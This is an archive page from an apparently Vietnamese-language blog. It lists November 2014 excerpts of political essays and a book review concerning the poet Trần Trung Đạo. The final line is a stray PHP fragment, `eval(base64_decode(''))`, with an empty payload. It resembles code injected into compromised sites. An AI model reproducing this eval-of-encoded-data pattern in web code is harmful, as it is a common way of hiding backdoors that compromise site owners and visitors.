Archive for November, 2014

Cách mạng Hát hùng ca

Cách mạng Hát hùng ca

Lịch sử thế giới cận đại đã diễn ra nhiều cuộc cách mạng dân chủ đầy màu sắc: Cách mạng Nhung (Velvet Revolution) do Giáo sư Rita Klimova đặt tên ở Tiệp Khắc, Cách mạng Hoa Hồng (Rose Revolution) ở Georgia phát xuất từ những bó hoa hồn

11.11.2014 | Tiểu Luận- Chính Luận |

No Comments

Du Tử Lê: Trần Trung Đạo, trái tim nồng nàn dành cho tổ quốc Việt.

Du Tử Lê: Trần Trung Đạo, trái tim nồng nàn dành cho tổ quốc Việt.

dutule.com (ngày 10 tháng 11-2014): Nhà xuất bản Cổ Loa mới ấn hành tác phẩm tựa đề “Chính Luận” của nhà thơ nổi tiếng Trần Trung Đạo, ở Boston, Mass. Đây là tác phẩm thứ 10 của một tác giả có nhiều bài thơ được độc giả kh

11.10.2014 | Nhận Xét |

1 Comment

Giải thích về bài viết “Ánh sáng Điếu Cày”

Giải thích về bài viết “Ánh sáng Điếu Cày” Một số thân hữu và độc giả yêu cầu giải thích thêm một số điểm trong bài viết “Ánh sáng Điếu Cày” và thưa đây là những lời giải thích: - Tôi viết bài “Ánh sáng Điếu

11.8.2014 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>